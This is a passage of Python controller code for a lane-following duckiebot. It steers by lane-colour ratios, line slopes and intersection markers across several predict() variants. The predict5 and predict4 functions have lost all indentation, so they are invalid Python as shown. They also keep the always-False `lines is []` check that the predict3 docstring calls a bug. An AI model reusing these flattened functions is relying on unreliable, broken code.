                    # Low positive slope: back down once for safety, then
                    # turn right.
                    self.buffer = [[0.1, -1]] * 20 + [[-self.stop_speed(0.44), 0]]
                    return [-self.stop_speed(0.44), 0]
                # By default just turn right hard; should be safe.
                self.buffer = [[0.1, -1]] * 19
                return [0.1, -1]
            if white_b_l > 0.02 and yellow_b_r <= 0.02:
                # Lots of white on the left cannot be the yellow lane;
                # turn right to locate the yellow lane.
                return [0.1, -1]
            return [0.1, 1]
        else:
            # Plenty of yellow on the left (lane or grass): turn right to
            # gather more information.
            return [0.1, -1]

    # Intersections are announced by a red bar across the road.
    if self.intersection:
        red_bar, red_bar_pos = has_red_bar(image)
        if red_bar and red_bar_pos == 'top':
            self.turn_right_incoming = self.turn_left_incoming = False
            return [self.stop_speed(0.44), steerer]
        if red_bar and red_bar_pos == 'mid':
            self.turn_right_incoming = self.turn_left_incoming = False
            return [self.stop_speed(0.44), steerer]
        if red_bar and red_bar_pos == 'bot':
            self.turn_right_incoming = self.turn_left_incoming = False
            self.middle = False
            self.passing_intersection = True
            if self.remaining_steps_of_slow > 0:
                self.buffer = [[0.1, 0]] * 50
                return [0.1, 0]
            else:
                self.buffer = [[self.stop_speed(0.44), 0]] * 16
                return [self.stop_speed(0.44), steerer]

    # On track to turn left.
    if self.turn_left_incoming:
        if yellow_b_l <= 0.02:
            return [self.stop_speed(0.35), 1]
        if (neg_slope_avg is not None and neg_slope_avg <= -0.6) \
                or pos_slope_avg is not None:
            # Turning left eventually yields a steep right-side slope or
            # positive slopes again: the turn is done.
            self.turn_left_incoming = False
            return [self.stop_speed(0.44), 0]

    # On track to turn right; only start once the yellow lane is gone.
    if self.turn_right_incoming:
        if yellow_b_l < 0.02 and yellow_b_s < 0.1:
            # Something's wrong.
            self.turn_right_incoming = False
            return [self.stop_speed(0.35), 1]
        if yellow_b_s < 0.1 or white_b_r > 0.01:
            # Still seeing lots of yellow lane to pass through.
            return [self.stop_speed(0.44), 0]
        if psa > 0 and psa < 0.25:
            self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 16
        else:
            self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 8
        self.turn_right_incoming = False
        return self.buffer.pop()

    # Between the two lanes, no turn expected: standard situations.
    if pos_slope_avg is not None and neg_slope_avg is not None:
        if pos_slope_avg >= 0.65 and neg_slope_avg <= -0.6:
            return [self.stop_speed(0.8), steerer]
        if pos_slope_avg < 0.65 and neg_slope_avg <= -0.6:
            # Right curve ahead.
            self.turn_right_incoming = True
        if neg_slope_avg > -0.6:
            # Left curve ahead.
            self.turn_left_incoming = True
        if yellow_b_l < 0.02:
            return [self.stop_speed(0.8), 1]
        if white_b_r < 0.02:
            return [self.stop_speed(0.8), -1]
        return [self.stop_speed(0.8), 0]
    if pos_slope_avg is not None:
        if pos_slope_avg < 0.5 and neg_slope_avg is None:
            # Right curve ahead.
            self.turn_right_incoming = True
        if white_b_r > 0.02:
            return [self.stop_speed(0.8), steerer]
        else:
            return [self.stop_speed(0.44), steerer]
    if neg_slope_avg is not None:
        if neg_slope_avg > -0.6:
            # Left curve ahead.
            self.turn_left_incoming = True
        if white_b_r > 0.02:
            return [self.stop_speed(0.8), steerer]
        else:
            return [self.stop_speed(0.44), steerer]
    return [self.stop_speed(0.44), steerer]
def predict3(self, rgb_array=None, raw_obs=None):
    """Variant of predict() with adjusted thresholds and turn handling.

    Differences from predict(): guarded psa comparisons (psa > 0) in the
    lane-finding spin logic, a longer slow buffer at intersections (100
    steps), extra sanity checks while turning left, and slightly
    different turn-right thresholds.

    BUG FIX: the empty-lane check was `lines is []`, which is always
    False (identity against a fresh list); changed to `not lines`.
    Large blocks of commented-out dead code were removed.
    """
    print("Status ", self.turn_left_incoming, self.turn_right_incoming, self.middle)
    if rgb_array is None:
        return [0, 0]
    image = np.array(rgb_array)

    # Drain any pre-planned actions first.
    if self.buffer != []:
        action = self.buffer.pop()
        if self.stop_sign and raw_obs is not None:
            self.detect_stop(raw_obs)
        return action

    # For maps with pits: swerve hard left when a pit fills the view.
    if self.has_pit and is_pit(rgb_array, 100, 200, 699, 399) > 0.9:
        self.buffer = [[0.1, 1.0]] * 62
        self.middle = False
        return [0.1, 1.0]

    # For maps with stop signs.
    if self.stop_sign and raw_obs is not None:
        self.detect_stop(raw_obs)

    lines, pos_slope_avg, neg_slope_avg = detect_lane(rgb_array=image)
    print("Slopes ", pos_slope_avg, neg_slope_avg)
    if not lines:
        return [1.0, 1]

    psa = 0 if pos_slope_avg is None else pos_slope_avg
    nsa = 0 if neg_slope_avg is None else neg_slope_avg
    # Steer toward the side with the weaker slope, clamped to [-1, 1].
    steerer = abs(nsa) - psa
    if steerer < 0:
        steerer = max(steerer, -1)
    if steerer > 0:
        steerer = min(steerer, 1)

    # Colour statistics in three regions of the frame.
    yellow_b_l, white_b_l, max_g_b_l = inspect_box(image, 0, 300, 399, 599)    # bottom-left
    yellow_b_r, white_b_r, max_g_b_r = inspect_box(image, 400, 300, 799, 599)  # bottom-right
    yellow_b_s, white_b_s, max_g_b_s = inspect_box(image, 200, 500, 599, 599)  # bottom stripe
    print("Yellows ", yellow_b_l, yellow_b_s, yellow_b_r)
    print("Whites ", white_b_l, white_b_s, white_b_r)
    print("Max green vals ", max_g_b_l, max_g_b_s, max_g_b_r)

    # Big assumption of intersection: always have either left or forward.
    if self.passing_intersection:
        if white_b_l > 0.01 and white_b_r > 0.01:
            # Approaching the sideway: have to turn left.
            if self.remaining_steps_of_slow > 0:
                fwd_steps = [[0.1, 0]] * 50
                buf_steps = [[0.1, 0]] * 10
                self.remaining_steps_of_slow = 10
            else:
                fwd_steps = [[0.44, 0]] * 16
                buf_steps = [[0.44, 0]] * 3
            self.buffer = fwd_steps + [[0.1, 1]] * 30 + buf_steps
            self.passing_intersection = False
            return self.buffer.pop()
        # Otherwise it is okay to go straight through.
        if self.remaining_steps_of_slow > 0:
            fwd_steps = [[0.1, 0]] * 50
            self.remaining_steps_of_slow = 0
        else:
            fwd_steps = [[0.44, 0]] * 16
        self.buffer = fwd_steps
        self.passing_intersection = False
        return self.buffer.pop()

    # Not yet between the two lane markings: locate the lane.
    if not self.middle:
        if yellow_b_l > 0.02 and white_b_l < 0.0001 and white_b_r > 0.0001:
            if yellow_b_s > 0.001:
                # Yellow under the bot: back out and spin right.
                if psa > 0.25:
                    self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 8 + [[-self.stop_speed(0.35), 0]]
                else:
                    self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 10 + [[-self.stop_speed(0.35), 0]]
                return self.buffer.pop()
            # Between the two lanes already.
            self.middle = True
            if steerer > 0:
                return [self.stop_speed(0.44), 1]
            else:
                return [self.stop_speed(0.44), -1]
        elif yellow_b_l > 0.02 and white_b_l < 0.0001 and white_b_r <= 0.0001:
            if psa > 0.5:
                # Between 2 lanes, a bit close to the left lane.
                return [self.stop_speed(0.44), steerer]
            else:
                # Positive slope too small: spin right by varying amounts,
                # falling back to a plain right turn when no positive slope.
                if yellow_b_s < 0.1:
                    return [0.1, 1]
                elif psa > 0 and psa < 0.1:
                    self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 16
                    return self.buffer.pop()
                elif psa > 0 and psa < 0.2:
                    self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 8
                    return self.buffer.pop()
                elif psa > 0:
                    self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 4
                    return self.buffer.pop()
                return [0.1, -1]
        elif yellow_b_l > 0.02 and white_b_r > 0.02 and yellow_b_r > 0.02:
            # Definitely grass on the right.
            return [self.stop_speed(0.44), 1]
        elif yellow_b_l <= 0.02:
            if yellow_b_r > 0.02 and white_b_r > 0.02:
                if white_b_l < 0.02:
                    # Probably the grass; turn left to find out more.
                    return [0.1, 1]
                else:
                    # Unclear scene: back down.
                    return [-self.stop_speed(0.44), 0]
            if white_b_l > 0.02 and white_b_r > 0.02:
                # Could be grass ahead or the map edge; false edges may be
                # detected, so back down a bit.
                return [-self.stop_speed(0.44), 0]
            if white_b_r > 0.02:
                return [self.stop_speed(0.44), 1]
            if white_b_l > 0.02 and yellow_b_r > 0.02:
                # Facing the wrong way: turn around, guided by the slopes.
                if pos_slope_avg is not None and pos_slope_avg < 0.6:
                    # Low positive slope: back down once for safety, then
                    # turn right.
                    self.buffer = [[0.1, -1]] * 20 + [[-self.stop_speed(0.44), 0]]
                    return [-self.stop_speed(0.44), 0]
                # By default just turn right hard; should be safe.
                self.buffer = [[0.1, -1]] * 19
                return [0.1, -1]
            if white_b_l > 0.02 and yellow_b_r <= 0.02:
                # Lots of white on the left cannot be the yellow lane;
                # turn right to locate the yellow lane.
                return [0.1, -1]
            return [0.1, 1]
        else:
            # Plenty of yellow on the left (lane or grass): turn right to
            # gather more information.
            return [0.1, -1]

    # Intersections are announced by a red bar across the road.
    if self.intersection:
        red_bar, red_bar_pos = has_red_bar(image)
        if red_bar and red_bar_pos == 'top':
            self.turn_right_incoming = self.turn_left_incoming = False
            return [self.stop_speed(0.44), steerer]
        if red_bar and red_bar_pos == 'mid':
            self.turn_right_incoming = self.turn_left_incoming = False
            return [self.stop_speed(0.44), steerer]
        if red_bar and red_bar_pos == 'bot':
            self.turn_right_incoming = self.turn_left_incoming = False
            self.middle = False
            self.passing_intersection = True
            if self.remaining_steps_of_slow > 0:
                # Longer creep than predict(): 100 steps.
                self.buffer = [[0.1, 0]] * 100
                return [0.1, 0]
            else:
                self.buffer = [[self.stop_speed(0.44), 0]] * 16
                return [self.stop_speed(0.44), steerer]

    # On track to turn left.
    if self.turn_left_incoming:
        if yellow_b_r > 0.001:
            # Something's wrong: yellow should not be on the right.
            self.turn_left_incoming = False
            return [0.1, -1]
        if white_b_l > 0.01:
            return [0.1, 1]
        if yellow_b_l <= 0.02:
            return [self.stop_speed(0.35), 1]
        if (neg_slope_avg is not None and neg_slope_avg <= -0.6) \
                or pos_slope_avg is not None:
            # Turning left eventually yields a steep right-side slope or
            # positive slopes again: the turn is done.
            self.turn_left_incoming = False
            return [self.stop_speed(0.44), 0]

    # On track to turn right; only start once the yellow lane is gone.
    if self.turn_right_incoming:
        if yellow_b_l < 0.02 and yellow_b_s < 0.1:
            # Something's wrong.
            self.turn_right_incoming = False
            return [self.stop_speed(0.35), 1]
        if yellow_b_s < 0.15 or white_b_r > 0.01:
            # Still seeing lots of yellow lane to pass through.
            return [self.stop_speed(0.44), 0]
        if psa > 0 and psa < 0.2:
            self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 16
        else:
            self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 8
        self.turn_right_incoming = False
        return self.buffer.pop()

    # Between the two lanes, no turn expected: standard situations.
    if pos_slope_avg is not None and neg_slope_avg is not None:
        if pos_slope_avg >= 0.65 and neg_slope_avg <= -0.6:
            return [self.stop_speed(0.8), steerer]
        if pos_slope_avg < 0.65 and neg_slope_avg <= -0.6:
            # Right curve ahead.
            self.turn_right_incoming = True
        if neg_slope_avg > -0.6:
            # Left curve ahead.
            self.turn_left_incoming = True
        if yellow_b_l < 0.02:
            return [self.stop_speed(0.8), 1]
        if white_b_r < 0.02:
            return [self.stop_speed(0.8), -1]
        return [self.stop_speed(0.8), 0]
    if pos_slope_avg is not None:
        if pos_slope_avg < 0.5 and neg_slope_avg is None:
            # Right curve ahead.
            self.turn_right_incoming = True
        if white_b_r > 0.02:
            return [self.stop_speed(0.8), steerer]
        else:
            return [self.stop_speed(0.44), steerer]
    if neg_slope_avg is not None:
        if neg_slope_avg > -0.6:
            # Left curve ahead.
            self.turn_left_incoming = True
        if white_b_r > 0.02:
            return [self.stop_speed(0.8), steerer]
        else:
            return [self.stop_speed(0.44), steerer]
    return [self.stop_speed(0.44), steerer]
def predict5(self, rgb_array=None, raw_obs=None):
print("Status ",self.turn_left_incoming, self.turn_right_incoming, self.middle)
if rgb_array is None:
return [0, 0]
image = np.array(rgb_array)
if self.buffer != []:
action = self.buffer.pop()
if self.stop_sign and raw_obs is not None:
self.detect_stop(raw_obs)
return action
# For maps with pits
if self.has_pit and is_pit(rgb_array, 100, 200, 699, 399) > 0.9:
self.buffer = [[0.1, 1.0]] * 62
self.middle = False
return [0.1, 1.0]
# For maps with stop signs
if self.stop_sign and raw_obs is not None:
self.detect_stop(raw_obs)
lines, pos_slope_avg, neg_slope_avg = detect_lane(rgb_array=image)
print("Slopes ", pos_slope_avg, neg_slope_avg)
if lines is []:
return [1.0, 1]
if pos_slope_avg is None:
psa = 0
else:
psa = pos_slope_avg
if neg_slope_avg is None:
nsa = 0
else:
nsa = neg_slope_avg
steerer = abs(nsa) - psa
if steerer < 0:
steerer = max(steerer, -1)
if steerer > 0:
steerer = min(steerer, 1)
# if nsa != 0 and psa != 0:
# steerer = abs(nsa) - psa
# else:
# steerer = 0
# Bot-left
yellow_b_l, white_b_l, max_g_b_l = inspect_box(image, 0, 300, 399, 599)
# Bot-right
yellow_b_r, white_b_r, max_g_b_r = inspect_box(image, 400, 300, 799, 599)
# Bottom stripe
yellow_b_s, white_b_s, max_g_b_s = inspect_box(image, 200, 500, 599, 599)
print("Yellows ", yellow_b_l, yellow_b_s, yellow_b_r)
print("Whites ", white_b_l, white_b_s, white_b_r)
print("Max green vals ", max_g_b_l, max_g_b_s, max_g_b_r)
# Big assumption of intersection: Always have either left or forward
if self.passing_intersection:
if white_b_l > 0.01 and white_b_r > 0.01:
# approaching the sideway, have to turn left
if self.remaining_steps_of_slow > 0:
fwd_steps = [[0.1, 0]] * 50
buf_steps = [[0.1, 0]] * 10
self.remaining_steps_of_slow = 10
else:
fwd_steps = [[0.44, 0]] * 16
buf_steps = [[0.44, 0]] * 3
self.buffer = fwd_steps + [[0.1, 1]] * 30 + buf_steps
self.passing_intersection = False
return self.buffer.pop()
# okay, can go forward
if self.remaining_steps_of_slow > 0:
fwd_steps = [[0.1, 0]] * 50
self.remaining_steps_of_slow = 0
else:
fwd_steps = [[0.44, 0]] * 16
self.buffer = fwd_steps
self.passing_intersection = False
return self.buffer.pop()
# Find lanes
if not self.middle:
# return [-self.stop_speed(0.44), 0]
# if self.intersection:
# if white_b_l < 0.001:
# if white_b_r < 0.001:
# self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 8
# return self.buffer.pop()
# if white_b_l > 0.01:
# if white_b_r < 0.001:
# # stuck to the left side...
# self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 13
# return self.buffer.pop()
if yellow_b_l > 0.02 and white_b_l < 0.0001 and white_b_r > 0.0001:
# consider the middle boy
if yellow_b_s > 0.001:
# oof
# if psa >= 1:
# self.buffer = [[]]
if psa > 0.25:
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 8 + [[-self.stop_speed(0.35), 0]]
else:
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 10 + [[-self.stop_speed(0.35), 0]]
return self.buffer.pop()
# between 2 lanes alr
self.middle = True
if steerer > 0:
return [self.stop_speed(0.44), 1]
else:
return [self.stop_speed(0.44), -1]
elif yellow_b_l > 0.02 and white_b_l < 0.0001 and white_b_r <= 0.0001:
if psa > 0.5:
# between 2 lanes, a bit close to left lane
# self.middle = True
return [self.stop_speed(0.44), steerer]
elif yellow_b_s < 0.1:
return [0.1, 0]
elif psa < 0.1:
# self.middle = True
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 16
return self.buffer.pop()
elif psa < 0.2:
# self.middle = True
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 8
return self.buffer.pop()
elif nsa < 0 and nsa > -0.2:
self.buffer = [[0.1, 0], [0.1, 1], [0.1, 1]] * 8
return self.buffer.pop()
elif nsa < 0 and nsa > -0.1:
self.buffer = [[0.1, 0], [0.1, 1], [0.1, 1]] * 16
return self.buffer.pop()
else:
return [0.1, -1]
# self.buffer = [[0.35, -1]] *20 + [[0.44, 0]] * 5
# return self.buffer.pop()
elif yellow_b_l > 0.02 and white_b_r > 0.02 and yellow_b_r > 0.02:
# definitely grass on the right
return [self.stop_speed(0.44), 1]
elif yellow_b_l <= 0.02:
# if yellow_b_r < 0.001 and yellow_b_l < 0.001:
# # Possibly in the right lane, just need to turn
# self.buffer = [[0.1, 0], [0.1, 1], [0.1, 1]] * int(20 / self.locating_turns)
# self.locating_turns += 1
# return self.buffer.pop()
if yellow_b_r > 0.02 and white_b_r > 0.02:
if white_b_l < 0.02:
# prolly the grass
# turn to the left to find out more
return [0.1, 1]
else:
# kinda freakish
# let's backdown
return [-self.stop_speed(0.44), 0]
if yellow_b_r > 0.02 and white_b_l < 0.02:
return [-self.stop_speed(0.44), 0]
if white_b_l > 0.02 and white_b_r > 0.02:
if white_b_s < 0.01 and psa > 0 and psa < 0.25 and nsa < 0 and nsa > -0.25:
print(psa, nsa)
# in a middle of the curve, let's u-turn
self.buffer = [[0.1, 0], [0.1, 1], [0.1, 1]] * int(20 / self.locating_turns)
self.locating_turns += 1
return self.buffer.pop()
# cheeky
# in front could be the grass
# but it could also be facing the edge
# false edges may be detected, so let's back down a bit
return [-self.stop_speed(0.44), 0]
if white_b_r > 0.02:
return [self.stop_speed(0.44), 1]
if white_b_l > 0.01 and yellow_b_r > 0.01:
# oh boy, we're reverse
# let's turn around madly
# welp, based on the slopes!
if pos_slope_avg is not None and pos_slope_avg < 0.1:
# positive slope is very low
# let's back down once for safety and turn right
self.buffer = [[0.1, -1]] * 30 + [[-self.stop_speed(0.44), 0]] * 3
return self.buffer.pop()
# By default, just turn right madly, should be safe
self.buffer = [[0.1, -1]] * 16
return [0.1, -1]
if white_b_l > 0.02 and yellow_b_r <= 0.02:
# it's kinda hard to tell
# if there's a lot of white on the left, then it shouldn't be the yellow lane
# just turn right to identify where the yellow lane is
return [0.1, -1]
return [0.1, 1]
else: # plenty of yellow on the left
# If there's lots of white-gray on the left, it's the grass
# If not, highly likely that it's the yellow lane
# Anyhow, turn right to find more information
return [0.1, -1]
if self.intersection:
red_bar, red_bar_pos = has_red_bar(image)
if red_bar and red_bar_pos == 'top':
self.turn_right_incoming = self.turn_left_incoming = False
return [self.stop_speed(0.44), steerer]
if red_bar and red_bar_pos == 'mid':
self.turn_right_incoming = self.turn_left_incoming = False
return [self.stop_speed(0.44), steerer]
if red_bar and red_bar_pos == 'bot':
self.turn_right_incoming = self.turn_left_incoming = False
self.middle = False
self.passing_intersection = True
if self.remaining_steps_of_slow > 0:
self.buffer = [[0.1, 0]] * 50
return [0.1, 0]
else:
self.buffer = [[self.stop_speed(0.44), 0]] * 16
return [self.stop_speed(0.44), steerer]
# if white_b_l > 0.01 and white_b_r > 0.01 and white_b_s > 0:
# self.buffer = [[-self.stop_speed(0.44), 1]] * 5
# return [-self.stop_speed(0.44), 1]
# On track to turn left
if self.turn_left_incoming:
if yellow_b_l <= 0.02:
if yellow_b_l <= 0.001:
return [0.1, 1]
return [self.stop_speed(0.35), 1]
if nsa <= -0.6 or pos_slope_avg is not None:
# If we turn left, eventually the bot will find a high enuf slope on the right side
# or we see the positive slopes!
self.turn_left_incoming = False
# self.middle = False
return [self.stop_speed(0.44), 0]
# On track to turn right
# Only start to turn once you can't see the yellow lane
if self.turn_right_incoming:
if yellow_b_l < 0.02 and yellow_b_s < 0.15:
# something's wrong
self.turn_right_incoming = False
return [self.stop_speed(0.35), 1]
if yellow_b_s < 0.15 or white_b_r > 0.01:
# still seeing lots of yellow lane to pass thru
return [self.stop_speed(0.44), 0]
if psa < 0.2:
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 16
else:
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 8
# self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 16
self.turn_right_incoming = False
# self.middle = False
return self.buffer.pop()
# Duckie the bot is in the middle of 2 lanes
# Duckie is not expecting any turns
# Expecting standard situations
# This is to correct extreme cases
if yellow_b_r > 0.01:
return [0.1, -1]
if yellow_b_l < 0.01:
return [0.1, 1]
if pos_slope_avg is not None and neg_slope_avg is not None:
if pos_slope_avg >= 0.65 and neg_slope_avg <= -0.6:
return [self.stop_speed(0.8), steerer]
if pos_slope_avg < 0.65 and (neg_slope_avg <= -0.6 or yellow_b_l > 0.02):
# Found a right curve here
# Believe Duckie will turn right in the future
self.turn_right_incoming = True
if neg_slope_avg > -0.6 and white_b_r > 0.02:
# Found a left curve here
# Believe Duckie will turn left in the future
self.turn_left_incoming = True
if yellow_b_l < 0.02:
return [self.stop_speed(0.44), 1]
if white_b_r < 0.02:
return [self.stop_speed(0.44), -1]
return [self.stop_speed(0.44), 0]
if pos_slope_avg is not None:
if pos_slope_avg < 0.5 and neg_slope_avg is None:
# Found a right curve here
# Believe Duckie will turn right in the future
self.turn_right_incoming = True
if white_b_r > 0.02:
return [self.stop_speed(0.8), steerer]
else:
return [self.stop_speed(0.44), steerer]
if neg_slope_avg is not None:
if neg_slope_avg > -0.6:
# Found a left curve here
# Believe Duckie will turn left in the future
self.turn_left_incoming = True
if white_b_r > 0.02:
return [self.stop_speed(0.8), steerer]
else:
return [self.stop_speed(0.44), steerer]
return [self.stop_speed(0.44), steerer]
def predict4(self, rgb_array=None, raw_obs=None):
print("Status ",self.turn_left_incoming, self.turn_right_incoming, self.middle)
if rgb_array is None:
return [0, 0]
image = np.array(rgb_array)
if self.buffer != []:
action = self.buffer.pop()
if self.stop_sign and raw_obs is not None:
self.detect_stop(raw_obs)
return action
# For maps with pits
if self.has_pit and is_pit(rgb_array, 100, 200, 699, 399) > 0.9:
self.buffer = [[0.1, 1.0]] * 62
self.middle = False
return [0.1, 1.0]
# For maps with stop signs
if self.stop_sign and raw_obs is not None:
self.detect_stop(raw_obs)
lines, pos_slope_avg, neg_slope_avg = detect_lane(rgb_array=image)
print("Slopes ", pos_slope_avg, neg_slope_avg)
if lines is []:
return [1.0, 1]
if pos_slope_avg is None:
psa = 0
else:
psa = pos_slope_avg
if neg_slope_avg is None:
nsa = 0
else:
nsa = neg_slope_avg
steerer = abs(nsa) - psa
if steerer < 0:
steerer = max(steerer, -1)
if steerer > 0:
steerer = min(steerer, 1)
# if nsa != 0 and psa != 0:
# steerer = abs(nsa) - psa
# else:
# steerer = 0
# Bot-left
yellow_b_l, white_b_l, max_g_b_l = inspect_box(image, 0, 300, 399, 599)
# Bot-right
yellow_b_r, white_b_r, max_g_b_r = inspect_box(image, 400, 300, 799, 599)
# Bottom stripe
yellow_b_s, white_b_s, max_g_b_s = inspect_box(image, 200, 500, 599, 599)
print("Yellows ", yellow_b_l, yellow_b_s, yellow_b_r)
print("Whites ", white_b_l, white_b_s, white_b_r)
print("Max green vals ", max_g_b_l, max_g_b_s, max_g_b_r)
# Big assumption of intersection: Always have either left or forward
if self.passing_intersection:
if white_b_l > 0.01 and white_b_r > 0.01:
# approaching the sideway, have to turn left
if self.remaining_steps_of_slow > 0:
fwd_steps = [[0.1, 0]] * 50
buf_steps = [[0.1, 0]] * 10
self.remaining_steps_of_slow = 10
else:
fwd_steps = [[0.44, 0]] * 16
buf_steps = [[0.44, 0]] * 3
self.buffer = fwd_steps + [[0.1, 1]] * 30 + buf_steps
self.passing_intersection = False
return self.buffer.pop()
# okay, can go forward
if self.remaining_steps_of_slow > 0:
fwd_steps = [[0.1, 0]] * 50
self.remaining_steps_of_slow = 0
else:
fwd_steps = [[0.44, 0]] * 16
self.buffer = fwd_steps
self.passing_intersection = False
return self.buffer.pop()
# Find lanes
if not self.middle:
# return [-self.stop_speed(0.44), 0]
# if self.intersection:
# if white_b_l < 0.001:
# if white_b_r < 0.001:
# self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 8
# return self.buffer.pop()
# if white_b_l > 0.01:
# if white_b_r < 0.001:
# # stuck to the left side...
# self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 13
# return self.buffer.pop()
if yellow_b_l > 0.02 and white_b_l < 0.0001 and white_b_r > 0.0001:
# consider the middle boy
if yellow_b_s > 0.001:
# oof
# if psa >= 1:
# self.buffer = [[]]
if psa > 0.25:
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 8 + [[-self.stop_speed(0.35), 0]]
else:
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 10 + [[-self.stop_speed(0.35), 0]]
return self.buffer.pop()
# between 2 lanes alr
self.middle = True
if steerer > 0:
return [self.stop_speed(0.44), 1]
else:
return [self.stop_speed(0.44), -1]
elif yellow_b_l > 0.02 and white_b_l < 0.0001 and white_b_r <= 0.0001:
if psa > 0.5:
# between 2 lanes, a bit close to left lane
# self.middle = True
return [self.stop_speed(0.44), steerer]
else:
# slope too small
# if yellow_b_s < 0.1:
# return [0.1, 1]
if psa == 0:
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 4
return self.buffer.pop()
elif psa < 0.1:
# self.middle = True
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 16
return self.buffer.pop()
elif psa < 0.2:
# self.middle = True
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 8
return self.buffer.pop()
else:
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 4
return self.buffer.pop()
# self.buffer = [[0.35, -1]] *20 + [[0.44, 0]] * 5
# return self.buffer.pop()
elif yellow_b_l > 0.02 and white_b_r > 0.02 and yellow_b_r > 0.02:
# definitely grass on the right
return [self.stop_speed(0.44), 1]
elif yellow_b_l <= 0.02:
if yellow_b_r > 0.02 and white_b_r > 0.02:
if white_b_l < 0.02:
# prolly the grass
# turn to the left to find out more
return [0.1, 1]
else:
# kinda freakish
# let's backdown
return [-self.stop_speed(0.44), 0]
if yellow_b_r > 0.02 and white_b_l < 0.02:
return [-self.stop_speed(0.44), 0]
if white_b_l > 0.02 and white_b_r > 0.02:
# cheeky
# in front could be the grass
# but it could also be facing the edge
# false edges may be detected, so let's back down a bit
return [-self.stop_speed(0.44), 0]
if white_b_r > 0.02:
return [self.stop_speed(0.44), 1]
if white_b_l > 0.02 and yellow_b_r > 0.02:
# oh boy, we're reverse
# let's turn around madly
# welp, based on the slopes!
if pos_slope_avg is not None and pos_slope_avg < 0.1:
# positive slope is very low
# let's back down once for safety and turn right
self.buffer = [[0.1, -1]] * 30 + [[-self.stop_speed(0.44), 0]] * 3
return self.buffer.pop()
# By default, just turn right madly, should be safe
self.buffer = [[0.1, -1]] * 16
return [0.1, -1]
if white_b_l > 0.02 and yellow_b_r <= 0.02:
# it's kinda hard to tell
# if there's a lot of white on the left, then it shouldn't be the yellow lane
# just turn right to identify where the yellow lane is
return [0.1, -1]
return [0.1, 1]
else: # plenty of yellow on the left
# If there's lots of white-gray on the left, it's the grass
# If not, highly likely that it's the yellow lane
# Anyhow, turn right to find more information
return [0.1, -1]
if self.intersection:
red_bar, red_bar_pos = has_red_bar(image)
if red_bar and red_bar_pos == 'top':
self.turn_right_incoming = self.turn_left_incoming = False
return [self.stop_speed(0.44), steerer]
if red_bar and red_bar_pos == 'mid':
self.turn_right_incoming = self.turn_left_incoming = False
return [self.stop_speed(0.44), steerer]
if red_bar and red_bar_pos == 'bot':
self.turn_right_incoming = self.turn_left_incoming = False
self.middle = False
self.passing_intersection = True
if self.remaining_steps_of_slow > 0:
self.buffer = [[0.1, 0]] * 50
return [0.1, 0]
else:
self.buffer = [[self.stop_speed(0.44), 0]] * 16
return [self.stop_speed(0.44), steerer]
if white_b_l > 0.01 and white_b_r > 0.01 and white_b_s > 0:
self.buffer = [[-self.stop_speed(0.44), 1]] * 5
return [-self.stop_speed(0.44), 1]
if white_b_l < 0.001 and white_b_r < 0.001 \
and yellow_b_l < 0.001 and yellow_b_r < 0.001 \
and white_b_s < 0.001 and yellow_b_s < 0.001:
self.buffer = [[-self.stop_speed(0.44), 1]] * 5
return [-self.stop_speed(0.44), 1]
# On track to turn left
if self.turn_left_incoming:
if yellow_b_l <= 0.01 or yellow_b_r > 0.01 or white_b_r > 0.001:
return [self.stop_speed(0.35), 1]
if nsa <= -0.6 or pos_slope_avg is not None:
# If we turn left, eventually the bot will find a high enuf slope on the right side
# or we see the positive slopes!
self.turn_left_incoming = False
# self.middle = False
return [self.stop_speed(0.44), 0]
# On track to turn right
# Only start to turn once you can't see the yellow lane
if self.turn_right_incoming:
if yellow_b_l < 0.02 and yellow_b_s < 0.15:
# something's wrong
self.turn_right_incoming = False
return [self.stop_speed(0.35), 1]
if yellow_b_s < 0.15 or white_b_r > 0.01:
# still seeing lots of yellow lane to pass thru
return [self.stop_speed(0.44), 0]
if psa < 0.2:
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 16
else:
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 8
# self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 16
self.turn_right_incoming = False
# self.middle = False
return self.buffer.pop()
# This is to correct extreme cases
if yellow_b_l < 0.005:
return [0.1, 1]
# Duckie the bot is in the middle of 2 lanes
# Duckie is not expecting any turns
# Expecting standard situations
if pos_slope_avg is not None and neg_slope_avg is not None:
if pos_slope_avg >= 0.65 and neg_slope_avg <= -0.6:
return [self.stop_speed(0.8), steerer]
if pos_slope_avg < 0.65 and (neg_slope_avg <= -0.6 or yellow_b_l > 0.02):
# Found a right curve here
# Believe Duckie will turn right in the future
self.turn_right_incoming = True
if neg_slope_avg > -0.6 and white_b_r > 0.02:
# Found a left curve here
# Believe Duckie will turn left in the future
self.turn_left_incoming = True
if yellow_b_l < 0.02:
return [self.stop_speed(0.44), 1]
if white_b_r < 0.02:
return [self.stop_speed(0.44), -1]
return [self.stop_speed(0.44), 0]
if pos_slope_avg is not None:
if pos_slope_avg < 0.5 and neg_slope_avg is None:
# Found a right curve here
